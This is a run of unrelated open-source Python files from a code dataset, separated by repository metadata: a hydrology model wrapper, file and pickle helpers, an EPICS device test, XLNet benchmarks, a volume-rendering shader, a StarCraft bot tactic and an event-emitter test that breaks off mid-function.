File with simulation settings, default is 'Simulation.xml'.
ptq : str, optional
File with daily precipitation, temperature and discharge values,
default is 'ptq.txt'.
evap : str, optional
File with potential evaporation values, default is 'EVAP.txt'.
tmean : str, optional
File with long-term mean temperature values, default is 'T_mean.txt'.
ptcalt : str, optional
File with daily temperature and/or precipitation gradients,
default is 'PTCALT'txt'.
sc : str, optional
File describing the spatial relation between different subcatchments,
default is 'SubCatchment.txt'.
b : str, optional
File with parameter sets for batch simulation, default is 'Batch.txt'.
ps : str, optional
File with precipitation series, default is 'P_series.txt'.
ts : str, optional
File with temperature series, default is 'T_series.txt'.
es : str, optional
File with evaporation series, default is 'EVAP_series.txt'.
bs : str, optional
File with batch simulation settings, default is 'Batch_Simulation.txt'.
mcs : str, optional
File with Monte Carlo simulation settings,
default is 'MC_Simulation.txt'.
gaps : str, optional
File with GAP simulation settings, default is 'GAP_Simulation.txt'.
results : str, optional
Results output folder, default is 'Results'.
summary : str, optional
Summary output file, default is 'Summary.txt'.
g : str, optional
Glacier profile file, default is 'GlacierProfile.txt'.
swe : str, optional
File with snow water equivalent data, default is 'ObsSWE.txt'.
snowcover . str, optional
File with snow cover data, default is 'SnowCover.txt'.
python : str, optional
Python objective function file, default is 'ObjFunc.py'.
"""
def __init__(
self, hbv_path=None, c='Clarea.xml', p='Parameter.xml',
s='Simulation.xml', ptq='ptq.txt', evap='EVAP.txt',
tmean='T_mean.txt', ptcalt='PTCALT.txt', sc='SubCatchment.txt',
b='Batch.txt', ps='P_series.txt', ts='T_series.txt',
es='EVAP_series.txt', bs='Batch_Simulation.txt',
mcs='MC_Simulation.txt', gaps='GAP_Simulation.txt',
results='Results', summary='Summary.txt', g='GlacierProfile.txt',
swe='ObsSWE.txt', snowcover='SnowCover.txt', python='ObjFunc.py'):
super().__init__(hbv_path)
self.results_folder = results
self.files = {
'c': c, 'p': p, 's': s, 'ptq': ptq, 'evap': evap,
'tmean': tmean, 'ptcalt': ptcalt, 'sc': sc, 'b': b, 'ps': ps,
'ts': ts, 'es': es, 'bs': bs, 'mcs': mcs, 'gaps': gaps,
'summary': summary, 'g': g, 'swe': swe, 'snowcover': snowcover,
'python': python}
class HBVcatchment(HBVsimulation):
"""
HBV-light catchment.
This class defines the catchment folder for HBV-light and provides
methods to run the model and show the progress.
Attributes
----------
bsn_dir : str
Path to the basin folder (containing a 'Data' sub-folder).
simulation : hbvpy.model.Scenario instance
Predefined HBV-light simulation setup to run for the chosen catchment.
"""
def __init__(self, bsn_dir, simulation):
"""
"""
self.__simulation = simulation
self.bsn_dir = bsn_dir
self.basin_name = os.path.relpath(bsn_dir, bsn_dir + '..')
if not os.path.exists(self.bsn_dir + self.results_folder):
os.makedirs(self.bsn_dir + self.results_folder)
def __getattr__(self, attr):
"""
"""
return getattr(self.__simulation, attr)
def __setattr__(self, attr, val):
"""
"""
if attr == '_HBVcatchment__simulation':
object.__setattr__(self, attr, val)
return setattr(self.__simulation, attr, val)
def _parse_files(self, command):
"""
Parse the necessary files to run HBV-light.
Parameters
----------
command : list
List of arguments needed to run HBV-light.
Returns
-------
command : list
List of arguments and files needed to run HBV-light.
"""
for name, file in self.files.items():
if file is None:
continue
else:
command.append('/' + name + ':' + file)
return command
def _print_progress(self, sim_type, process, debug_mode=False):
"""
Print the run progress of HBV-light.
Parameters
----------
sim_type : str
Simulation type.
process : Subprocess.process
Process to run the HBV model.
debug_mode : bool, optional
Choose whether to show the full HBV-light messages on the
command line, default is False.
"""
print('\nProcessing: ' + str(sim_type) +
' | Catchment: ' + str(self.basin_name))
if debug_mode is True:
while True:
line = process.stdout.readline()
if not line:
break
print(line)
else:
p = AnimatedProgressBar(end=100, width=50)
while True:
line = process.stdout.readline()
if not line:
break
p + 1
p.show_progress()
print
def run(self, sim_type, debug_mode=False):
"""
Run HBV-light.
NOTE: Each simulation type (sim_type) requires specific configuration
files. Please refer to the documentation of HBV-light for information
on the different simulation types and required files.
Parameters
----------
sim_type : {'SingleRun', 'MonteCarloRun', 'BatchRun', 'GAPRun'}
Simulation type.
debug_mode : bool, optional
If False a progress bar is shown, otherwise the standard
HBV-light output is shown, default is False.
"""
command = [
self.hbv_path, 'Run', self.bsn_dir,
sim_type, self.results_folder]
command = self._parse_files(command)
process = subprocess.Popen(
command, stdout=subprocess.PIPE, universal_newlines=True)
self._print_progress(sim_type, process, debug_mode=debug_mode)
| 31.830827
| 79
| 0.597969
|
26844ef34e134cc54a2ff8da5875198bd488add7
| 4,230
|
py
|
Python
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 425
|
2020-03-31T07:17:48.000Z
|
2022-03-30T09:44:41.000Z
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 6
|
2020-06-22T23:50:41.000Z
|
2021-11-19T08:48:35.000Z
|
PythonLinearNonlinearControl/helper.py
|
Geonhee-LEE/PythonLinearNonlinearControl
|
2a2467098108641483778c09ceb7906cb49f6cee
|
[
"MIT"
] | 88
|
2020-04-03T12:58:54.000Z
|
2022-03-28T07:01:22.000Z
|
import argparse
import datetime
import json
import os
import sys
import six
import pickle
from logging import DEBUG, basicConfig, getLogger, FileHandler, StreamHandler, Formatter, Logger
def make_logger(save_dir):
"""
Args:
save_dir (str): save directory
"""
# base config setting
basicConfig(
format='[%(asctime)s] %(name)s %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
# mypackage log level
logger = getLogger("PythonLinearNonlinearControl")
logger.setLevel(DEBUG)
# file handler
log_path = os.path.join(save_dir, "log.txt")
file_handler = FileHandler(log_path)
file_handler.setLevel(DEBUG)
file_handler.setFormatter(Formatter('%(message)s'))
logger.addHandler(file_handler)
# sh handler
# sh_handler = StreamHandler()
# logger.addHandler(sh_handler)
def int_tuple(s):
""" transform str to tuple
Args:
s (str): strings that you want to change
Returns:
tuple
"""
return tuple(int(i) for i in s.split(','))
def bool_flag(s):
""" transform str to bool flg
Args:
s (str): strings that you want to change
"""
if s == '1':
return True
elif s == '0':
return False
msg = 'Invalid value "%s" for bool flag (should be 0 or 1)'
raise ValueError(msg % s)
def file_exists(path):
""" Check file existence on given path
Args:
path (str): path of the file to check existence
Returns:
file_existence (bool): True if file exists otherwise False
"""
return os.path.exists(path)
def create_dir_if_not_exist(outdir):
""" Check directory existence and creates new directory if not exist
Args:
outdir (str): path of the file to create directory
RuntimeError:
file exists in outdir but it is not a directory
"""
if file_exists(outdir):
if not os.path.isdir(outdir):
raise RuntimeError('{} is not a directory'.format(outdir))
else:
return
os.makedirs(outdir)
def write_text_to_file(file_path, data):
""" Write given text data to file
Args:
file_path (str): path of the file to write data
data (str): text to write to the file
"""
with open(file_path, 'w') as f:
f.write(data)
def read_text_from_file(file_path):
""" Read given file as text
Args:
file_path (str): path of the file to read data
Returns
data (str): text read from the file
"""
with open(file_path, 'r') as f:
return f.read()
def save_pickle(file_path, data):
""" pickle given data to file
Args:
file_path (str): path of the file to pickle data
data (): data to pickle
"""
with open(file_path, 'wb') as f:
pickle.dump(data, f)
def load_pickle(file_path):
""" load pickled data from file
Args:
file_path (str): path of the file to load pickled data
Returns:
data (): data pickled in file
"""
with open(file_path, 'rb') as f:
if six.PY2:
return pickle.load(f)
else:
return pickle.load(f, encoding='bytes')
def prepare_output_dir(base_dir, args, time_format='%Y-%m-%d-%H%M%S'):
""" prepare a directory with current datetime as name.
created directory contains the command and args when the script was called as text file.
Args:
base_dir (str): path of the directory to save data
args (dict): arguments when the python script was called
time_format (str): datetime format string for naming directory to save data
Returns:
out_dir (str): directory to save data
"""
time_str = datetime.datetime.now().strftime(time_format)
outdir = os.path.join(base_dir, time_str)
create_dir_if_not_exist(outdir)
# Save all the arguments
args_file_path = os.path.join(outdir, 'args.txt')
if isinstance(args, argparse.Namespace):
args = vars(args)
write_text_to_file(args_file_path, json.dumps(args))
# Save the command
argv_file_path = os.path.join(outdir, 'command.txt')
argv = ' '.join(sys.argv)
write_text_to_file(argv_file_path, argv)
return outdir
| 26.772152
| 96
| 0.633806
|
3a62b6ca919a5256599f3facf3e7fe9db3c483b9
| 1,034
|
py
|
Python
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2019-06-17T20:08:54.000Z
|
2022-01-11T17:55:21.000Z
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 757
|
2017-12-21T23:16:41.000Z
|
2022-03-31T22:56:06.000Z
|
pcdsdevices/tests/test_disconnected.py
|
ghalym/pcdsdevices
|
0427e1b92b10e305bdd29cd3a968ce913bae60aa
|
[
"BSD-3-Clause-LBNL"
] | 38
|
2018-01-26T00:01:35.000Z
|
2022-02-17T00:48:55.000Z
|
import pytest
from ophyd.device import Component as Cpt
from ophyd.device import Device
from ophyd.signal import EpicsSignal
class Disconnected(Device):
sig01 = Cpt(EpicsSignal, '01')
sig02 = Cpt(EpicsSignal, '02')
sig03 = Cpt(EpicsSignal, '03')
sig04 = Cpt(EpicsSignal, '04')
sig05 = Cpt(EpicsSignal, '05')
sig06 = Cpt(EpicsSignal, '06')
sig07 = Cpt(EpicsSignal, '07')
sig08 = Cpt(EpicsSignal, '08')
sig09 = Cpt(EpicsSignal, '09')
sig10 = Cpt(EpicsSignal, '10')
sig11 = Cpt(EpicsSignal, '11')
sig12 = Cpt(EpicsSignal, '12')
sig13 = Cpt(EpicsSignal, '13')
sig14 = Cpt(EpicsSignal, '14')
sig15 = Cpt(EpicsSignal, '15')
sig16 = Cpt(EpicsSignal, '16')
sig17 = Cpt(EpicsSignal, '17')
sig18 = Cpt(EpicsSignal, '18')
sig19 = Cpt(EpicsSignal, '19')
sig20 = Cpt(EpicsSignal, '20')
@pytest.mark.timeout(5)
def test_instantiate_disconnected():
"""Check if environment handles disconnected devices gracefully"""
Disconnected('NO:CONN:', name='no_conn')
| 30.411765
| 70
| 0.659574
|
d9e7c04cfe349f0e1b0ca3c9115322f9d71b1450
| 7,517
|
py
|
Python
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 10
|
2019-12-28T21:31:19.000Z
|
2020-04-12T20:01:58.000Z
|
official/benchmark/xlnet_benchmark.py
|
zcdzcdzcd/models
|
a31b526a7617a152a138a865b5689bf5b59f655d
|
[
"Apache-2.0"
] | 8
|
2020-04-12T04:30:33.000Z
|
2021-09-17T20:54:44.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Executes XLNet benchmarks and accuracy tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import time
# pylint: disable=g-bad-import-order
from absl import flags
from absl.testing import flagsaver
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.benchmark import bert_benchmark_utils as benchmark_utils
from official.nlp.xlnet import run_classifier
from official.nlp.xlnet import run_squad
from official.utils.testing import benchmark_wrappers
# pylint: disable=line-too-long
PRETRAINED_CHECKPOINT_PATH = 'gs://cloud-tpu-checkpoints/xlnet/large/xlnet_model-1'
CLASSIFIER_TRAIN_DATA_PATH = 'gs://tf-perfzero-data/xlnet/imdb/spiece.model.len-512.train.tf_record'
CLASSIFIER_EVAL_DATA_PATH = 'gs://tf-perfzero-data/xlnet/imdb/spiece.model.len-512.dev.eval.tf_record'
SQUAD_DATA_PATH = 'gs://tf-perfzero-data/xlnet/squadv2_cased/'
# pylint: enable=line-too-long
FLAGS = flags.FLAGS
class XLNetBenchmarkBase(benchmark_utils.BertBenchmarkBase):
"""Base class to hold methods common to test classes in the module."""
def __init__(self, output_dir=None):
super(XLNetBenchmarkBase, self).__init__(output_dir)
self.num_epochs = None
self.num_steps_per_epoch = None
@flagsaver.flagsaver
def _run_xlnet_classifier(self):
"""Starts XLNet classification task."""
run_classifier.main(unused_argv=None)
@flagsaver.flagsaver
def _run_xlnet_squad(self):
"""Starts XLNet classification task."""
run_squad.main(unused_argv=None)
class XLNetClassifyAccuracy(XLNetBenchmarkBase):
"""Short accuracy test for XLNet classifier model.
Tests XLNet classification task model accuracy. The naming
convention of below test cases follow
`benchmark_(number of gpus)_gpu_(dataset type)` format.
"""
def __init__(self, output_dir=None, **kwargs):
self.train_data_path = CLASSIFIER_TRAIN_DATA_PATH
self.eval_data_path = CLASSIFIER_EVAL_DATA_PATH
self.pretrained_checkpoint_path = PRETRAINED_CHECKPOINT_PATH
super(XLNetClassifyAccuracy, self).__init__(output_dir=output_dir)
@benchmark_wrappers.enable_runtime_flags
def _run_and_report_benchmark(self,
training_summary_path,
min_accuracy=0.95,
max_accuracy=0.97):
"""Starts XLNet accuracy benchmark test."""
start_time_sec = time.time()
self._run_xlnet_classifier()
wall_time_sec = time.time() - start_time_sec
with tf.io.gfile.GFile(training_summary_path, 'rb') as reader:
summary = json.loads(reader.read().decode('utf-8'))
super(XLNetClassifyAccuracy, self)._report_benchmark(
stats=summary,
wall_time_sec=wall_time_sec,
min_accuracy=min_accuracy,
max_accuracy=max_accuracy)
def _setup(self):
super(XLNetClassifyAccuracy, self)._setup()
FLAGS.test_data_size = 25024
FLAGS.train_batch_size = 16
FLAGS.seq_len = 512
FLAGS.mem_len = 0
FLAGS.n_layer = 24
FLAGS.d_model = 1024
FLAGS.d_embed = 1024
FLAGS.n_head = 16
FLAGS.d_head = 64
FLAGS.d_inner = 4096
FLAGS.untie_r = True
FLAGS.n_class = 2
FLAGS.ff_activation = 'gelu'
FLAGS.strategy_type = 'mirror'
FLAGS.learning_rate = 2e-5
FLAGS.train_steps = 4000
FLAGS.warmup_steps = 500
FLAGS.iterations = 200
FLAGS.bi_data = False
FLAGS.init_checkpoint = self.pretrained_checkpoint_path
FLAGS.train_tfrecord_path = self.train_data_path
FLAGS.test_tfrecord_path = self.eval_data_path
def benchmark_8_gpu_imdb(self):
"""Run XLNet model accuracy test with 8 GPUs."""
self._setup()
FLAGS.model_dir = self._get_model_dir('benchmark_8_gpu_imdb')
# Sets timer_callback to None as we do not use it now.
self.timer_callback = None
summary_path = os.path.join(FLAGS.model_dir,
'summaries/training_summary.txt')
self._run_and_report_benchmark(summary_path)
class XLNetSquadAccuracy(XLNetBenchmarkBase):
"""Short accuracy test for XLNet squad model.
Tests XLNet squad task model accuracy. The naming
convention of below test cases follow
`benchmark_(number of gpus)_gpu_(dataset type)` format.
"""
def __init__(self, output_dir=None, **kwargs):
self.train_data_path = SQUAD_DATA_PATH
self.predict_file = os.path.join(SQUAD_DATA_PATH, "dev-v2.0.json")
self.test_data_path = os.path.join(SQUAD_DATA_PATH, "12048.eval.tf_record")
self.spiece_model_file = os.path.join(SQUAD_DATA_PATH, "spiece.cased.model")
self.pretrained_checkpoint_path = PRETRAINED_CHECKPOINT_PATH
super(XLNetSquadAccuracy, self).__init__(output_dir=output_dir)
@benchmark_wrappers.enable_runtime_flags
def _run_and_report_benchmark(self,
training_summary_path,
min_accuracy=87.0,
max_accuracy=89.0):
"""Starts XLNet accuracy benchmark test."""
start_time_sec = time.time()
self._run_xlnet_squad()
wall_time_sec = time.time() - start_time_sec
with tf.io.gfile.GFile(training_summary_path, 'rb') as reader:
summary = json.loads(reader.read().decode('utf-8'))
super(XLNetSquadAccuracy, self)._report_benchmark(
stats=summary,
wall_time_sec=wall_time_sec,
min_accuracy=min_accuracy,
max_accuracy=max_accuracy)
def _setup(self):
super(XLNetSquadAccuracy, self)._setup()
FLAGS.train_batch_size = 16
FLAGS.seq_len = 512
FLAGS.mem_len = 0
FLAGS.n_layer = 24
FLAGS.d_model = 1024
FLAGS.d_embed = 1024
FLAGS.n_head = 16
FLAGS.d_head = 64
FLAGS.d_inner = 4096
FLAGS.untie_r = True
FLAGS.ff_activation = 'gelu'
FLAGS.strategy_type = 'mirror'
FLAGS.learning_rate = 3e-5
FLAGS.train_steps = 8000
FLAGS.warmup_steps = 1000
FLAGS.iterations = 1000
FLAGS.bi_data = False
FLAGS.init_checkpoint = self.pretrained_checkpoint_path
FLAGS.train_tfrecord_path = self.train_data_path
FLAGS.test_tfrecord_path = self.test_data_path
FLAGS.spiece_model_file = self.spiece_model_file
FLAGS.predict_file = self.predict_file
FLAGS.adam_epsilon=1e-6
FLAGS.lr_layer_decay_rate=0.75
def benchmark_8_gpu_squadv2(self):
"""Run XLNet model squad v2 accuracy test with 8 GPUs."""
self._setup()
FLAGS.model_dir = self._get_model_dir('benchmark_8_gpu_squadv2')
FLAGS.predict_dir = FLAGS.model_dir
# Sets timer_callback to None as we do not use it now.
self.timer_callback = None
summary_path = os.path.join(FLAGS.model_dir,
'summaries/training_summary.txt')
self._run_and_report_benchmark(summary_path)
if __name__ == '__main__':
tf.test.main()
| 34.640553
| 102
| 0.715977
|
95522d862c784d36605c5cc196a9f2b4fb329196
| 10,862
|
py
|
Python
|
glue_vispy_viewers/volume/shaders.py
|
glue-viz/glue-vispy-viewer
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 19
|
2016-05-26T15:05:50.000Z
|
2021-12-02T10:48:30.000Z
|
glue_vispy_viewers/volume/shaders.py
|
Carifio24/glue-vispy-viewers
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 183
|
2016-05-05T10:38:56.000Z
|
2021-10-17T21:32:45.000Z
|
glue_vispy_viewers/volume/shaders.py
|
PennyQ/astro-vispy
|
7ce0c55989eee9dc4056e5ce1547591cbaab86b6
|
[
"BSD-2-Clause"
] | 15
|
2016-08-27T12:09:31.000Z
|
2021-11-07T18:52:54.000Z
|
# This file implements a fragment shader that can be used to visualize multiple
# volumes simultaneously. It is derived from the original fragment shader in
# vispy.visuals.volume, which is releaed under a BSD license included here:
#
# ===========================================================================
# Vispy is licensed under the terms of the (new) BSD license:
#
# Copyright (c) 2015, authors of Vispy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Vispy Development Team nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===========================================================================
#
# This modified version is released under the BSD license given in the LICENSE
# file in this repository.
try:
from textwrap import indent
except ImportError: # Python < 3.5
def indent(text, prefix):
return '\n'.join(prefix + line for line in text.splitlines())
# Vertex shader
VERT_SHADER = """
attribute vec3 a_position;
uniform vec3 u_shape;
varying vec3 v_position;
varying vec4 v_nearpos;
varying vec4 v_farpos;
void main() {
v_position = a_position;
// Project local vertex coordinate to camera position. Then do a step
// backward (in cam coords) and project back. Voila, we get our ray vector.
vec4 pos_in_cam = $viewtransformf(vec4(v_position, 1));
// intersection of ray and near clipping plane (z = -1 in clip coords)
pos_in_cam.z = -pos_in_cam.w;
v_nearpos = $viewtransformi(pos_in_cam);
// intersection of ray and far clipping plane (z = +1 in clip coords)
pos_in_cam.z = pos_in_cam.w;
v_farpos = $viewtransformi(pos_in_cam);
gl_Position = $transform(vec4(v_position, 1.0));
}
"""
# Fragment shader
FRAG_SHADER = """
// uniforms
{declarations}
uniform vec3 u_shape;
uniform float u_downsample;
uniform vec4 u_bgcolor;
uniform vec3 u_clip_min;
uniform vec3 u_clip_max;
//varyings
// varying vec3 v_texcoord;
varying vec3 v_position;
varying vec4 v_nearpos;
varying vec4 v_farpos;
// uniforms for lighting. Hard coded until we figure out how to do lights
const vec4 u_ambient = vec4(0.2, 0.4, 0.2, 1.0);
const vec4 u_diffuse = vec4(0.8, 0.2, 0.2, 1.0);
const vec4 u_specular = vec4(1.0, 1.0, 1.0, 1.0);
const float u_shininess = 40.0;
//varying vec3 lightDirs[1];
// global holding view direction in local coordinates
vec3 view_ray;
// for some reason, this has to be the last function in order for the
// filters to be inserted in the correct place...
float rand(vec3 co) {{
float a = 12.9898;
float b = 78.233;
float c = 43758.5453;
float dt= dot(vec2(co.x, co.y + co.z) ,vec2(a,b));
float sn= mod(dt,3.14);
return fract(sin(sn) * c);
}}
void main() {{
vec3 farpos = v_farpos.xyz / v_farpos.w;
vec3 nearpos = v_nearpos.xyz / v_nearpos.w;
// Calculate unit vector pointing in the view direction through this
// fragment.
view_ray = normalize(farpos.xyz - nearpos.xyz);
// Compute the distance to the front surface or near clipping plane
float distance = dot(nearpos-v_position, view_ray);
distance = max(distance, min((-0.5 - v_position.x) / view_ray.x,
(u_shape.x - 0.5 - v_position.x) / view_ray.x));
distance = max(distance, min((-0.5 - v_position.y) / view_ray.y,
(u_shape.y - 0.5 - v_position.y) / view_ray.y));
distance = max(distance, min((-0.5 - v_position.z) / view_ray.z,
(u_shape.z - 0.5 - v_position.z) / view_ray.z));
// Now we have the starting position on the front surface
vec3 front = v_position + view_ray * distance;
// Decide how many steps to take
int nsteps = int(-distance / u_downsample + 0.5);
if(nsteps < 1) discard;
// Get starting location and step vector in texture coordinates
vec3 step = ((v_position - front) / u_shape) / nsteps;
vec3 start_loc = front / u_shape;
float val;
// This outer loop seems necessary on some systems for large
// datasets. Ugly, but it works ...
vec3 loc = start_loc;
int iter = 0;
{before_loop}
// We avoid putting this if statement in the loop for performance
if (u_downsample > 1.) {{
// In the case where we are downsampling we use a step size that is
// random to avoid artifacts in the output. This appears to be fast
// enough to still make the downsampling worth it.
while (iter < nsteps) {{
for (iter=iter; iter<nsteps; iter++)
{{
{in_loop}
// Advance location deeper into the volume
loc += (0.5 + rand(loc)) * step;
}}
}}
}} else {{
while (iter < nsteps) {{
for (iter=iter; iter<nsteps; iter++)
{{
{in_loop}
// Advance location deeper into the volume
loc += step;
}}
}}
}}
float count = 0;
vec4 color = vec4(0., 0., 0., 0.);
vec4 total_color = vec4(0., 0., 0., 0.);
float max_alpha = 0;
{after_loop}
if(count > 0) {{
total_color /= count;
total_color.a = max_alpha;
// Due to issues with transparency in Qt5, we need to convert the color
// to a flattened version without transparency, so we do alpha blending
// with the background and set alpha to 1:
total_color.r = total_color.r * total_color.a + u_bgcolor.r * (1 - total_color.a);
total_color.g = total_color.g * total_color.a + u_bgcolor.g * (1 - total_color.a);
total_color.b = total_color.b * total_color.a + u_bgcolor.b * (1 - total_color.a);
total_color.a = 1.;
}} else {{
// For this it seems we can get away with using transparency (which we need
// to make sure axes/ticks/labels aren't hidden)
total_color = vec4(0, 0, 0, 0);
}}
gl_FragColor = total_color;
/* Set depth value - from visvis TODO
int iter_depth = int(maxi);
// Calculate end position in world coordinates
vec4 position2 = vertexPosition;
position2.xyz += ray*shape*float(iter_depth);
// Project to device coordinates and set fragment depth
vec4 iproj = gl_ModelViewProjectionMatrix * position2;
iproj.z /= iproj.w;
gl_FragDepth = (iproj.z+1.0)/2.0;
*/
}}
"""
def get_frag_shader(volumes, clipped=False, n_volume_max=5):
"""
Get the fragment shader code - we use the shader_program object to determine
which layers are enabled and therefore what to include in the shader code.
"""
declarations = ""
before_loop = ""
in_loop = ""
after_loop = ""
for index in range(n_volume_max):
declarations += "uniform $sampler_type u_volumetex_{0:d};\n".format(index)
before_loop += "dummy = $sample(u_volumetex_{0:d}, loc).g;\n".format(index)
declarations += "uniform $sampler_type dummy1;\n"
declarations += "float dummy;\n"
for label in sorted(volumes):
index = volumes[label]['index']
# Global declarations
declarations += "uniform float u_weight_{0:d};\n".format(index)
declarations += "uniform int u_enabled_{0:d};\n".format(index)
# Declarations before the raytracing loop
before_loop += "float max_val_{0:d} = 0;\n".format(index)
# Calculation inside the main raytracing loop
in_loop += "if(u_enabled_{0:d} == 1) {{\n\n".format(index)
if clipped:
in_loop += ("if(loc.r > u_clip_min.r && loc.r < u_clip_max.r &&\n"
" loc.g > u_clip_min.g && loc.g < u_clip_max.g &&\n"
" loc.b > u_clip_min.b && loc.b < u_clip_max.b) {\n\n")
in_loop += "// Sample texture for layer {0}\n".format(label)
in_loop += "val = $sample(u_volumetex_{0:d}, loc).g;\n".format(index)
if volumes[label].get('multiply') is not None:
index_other = volumes[volumes[label]['multiply']]['index']
in_loop += ("if (val != 0) {{ val *= $sample(u_volumetex_{0:d}, loc).g; }}\n"
.format(index_other))
in_loop += "max_val_{0:d} = max(val, max_val_{0:d});\n\n".format(index)
if clipped:
in_loop += "}\n\n"
in_loop += "}\n\n"
# Calculation after the main loop
after_loop += "// Compute final color for layer {0}\n".format(label)
after_loop += ("color = $cmap{0:d}(max_val_{0:d});\n"
"color.a *= u_weight_{0:d};\n"
"total_color += color.a * color;\n"
"max_alpha = max(color.a, max_alpha);\n"
"count += color.a;\n\n").format(index)
if not clipped:
before_loop += "\nfloat val3 = u_clip_min.g + u_clip_max.g;\n\n"
# Code esthetics
before_loop = indent(before_loop, " " * 4).strip()
in_loop = indent(in_loop, " " * 16).strip()
after_loop = indent(after_loop, " " * 4).strip()
return FRAG_SHADER.format(declarations=declarations,
before_loop=before_loop,
in_loop=in_loop,
after_loop=after_loop)
def main():
volumes = {}
volumes['banana'] = {'index': 3, 'enabled': True}
volumes['apple'] = {'index': 1, 'multiply': None, 'enabled': True}
volumes['apple'] = {'index': 1, 'multiply': 'banana', 'enabled': True}
print(get_frag_shader(volumes))
if __name__ == "__main__": # pragma: nocover
main()
| 34.702875
| 90
| 0.625575
|
0c2670963f285453784cc951da34c764a8e261e9
| 747
|
py
|
Python
|
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
from sharpy.plans.acts import ActBase
from sharpy.managers.roles import UnitTask
from sc2 import UnitTypeId, AbilityId
class ManTheBunkers(ActBase):
def __init__(self):
super().__init__()
async def execute(self) -> bool:
roles: 'UnitRoleManager' = self.knowledge.roles
bunkers = self.cache.own(UnitTypeId.BUNKER).ready
marines = self.cache.own(UnitTypeId.MARINE)
for bunker in bunkers: # type: Unit
if len(bunker.passengers) >= 4:
continue
if marines:
marine = marines.closest_to(bunker) #.prefer_idle()
self.do(marine(AbilityId.SMART, bunker))
roles.set_task(UnitTask.Reserved, marine)
return True
| 32.478261
| 67
| 0.631861
|
0f8f027f2f175380d970bea7fb1d80316440ca6d
| 1,451
|
py
|
Python
|
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | 1
|
2021-01-04T05:29:49.000Z
|
2021-01-04T05:29:49.000Z
|
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | null | null | null |
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from emitter import Emitter
class TestEmitter(TestCase):
def setUp(self):
self.emitter = Emitter()
def test_call_listeners(self):
called = [False]
def cb():
called[0] = True
self.emitter.on('hello.*', cb)
self.emitter.emit('hello.foo')
assert called[0]
self.emitter.remove('hello.*', cb)
assert self.emitter.listeners('hello') == []
def test_pass_data_to_listeners(self):
def cb(*args):
assert args == ('a', 'b')
self.emitter.on('data', cb)
self.emitter.emit('data', 'a', 'b')
def test_call_listeners_once(self):
called = [False]
def cb():
called[0] = not called[0]
